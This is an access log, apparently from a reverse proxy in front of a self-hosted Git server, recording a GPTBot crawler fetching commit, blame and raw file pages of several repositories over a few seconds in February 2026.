git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 193763] [Gzip 19.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" +[17/Feb/2026:14:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 18278] [Gzip 4.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" +[17/Feb/2026:14:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 20156] [Gzip 5.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" +[17/Feb/2026:14:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug" [Client 74.7.227.38] [Length 9882] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug" +[17/Feb/2026:14:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:14:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 10656] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:14:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 9938] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:14:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 24365] [Gzip 15.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" +[17/Feb/2026:14:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" +[17/Feb/2026:14:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" +[17/Feb/2026:14:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 10037] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" +[17/Feb/2026:14:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 9917] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" +[17/Feb/2026:14:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 9926] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" +[17/Feb/2026:14:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 10033] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" +[17/Feb/2026:14:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" +[17/Feb/2026:14:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 10257] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" +[17/Feb/2026:14:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 10456] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" +[17/Feb/2026:14:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" +[17/Feb/2026:14:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 465] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" +[17/Feb/2026:14:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 9915] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" +[17/Feb/2026:14:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" +[17/Feb/2026:14:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 10425] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" +[17/Feb/2026:14:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug" [Client 74.7.227.38] [Length 25375] [Gzip 5.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug" +[17/Feb/2026:14:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 15490] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" +[17/Feb/2026:14:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10194] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build" +[17/Feb/2026:14:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11673] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject" +[17/Feb/2026:14:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11674] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject" +[17/Feb/2026:14:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" +[17/Feb/2026:14:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11674] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject" +[17/Feb/2026:14:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10194] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build" +[17/Feb/2026:14:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:14:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fvite.config.ts" [Client 74.7.227.38] [Length 23743] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" +[17/Feb/2026:14:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10949] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs" +[17/Feb/2026:14:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 316829] [Gzip 14.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=split&whitespace=ignore-eol" +[17/Feb/2026:14:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2fassets%2fjs" [Client 74.7.227.38] [Length 23289] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" +[17/Feb/2026:14:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 11207] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv" +[17/Feb/2026:14:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10772] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10771] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9939] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14332] [Gzip 8.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10771] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 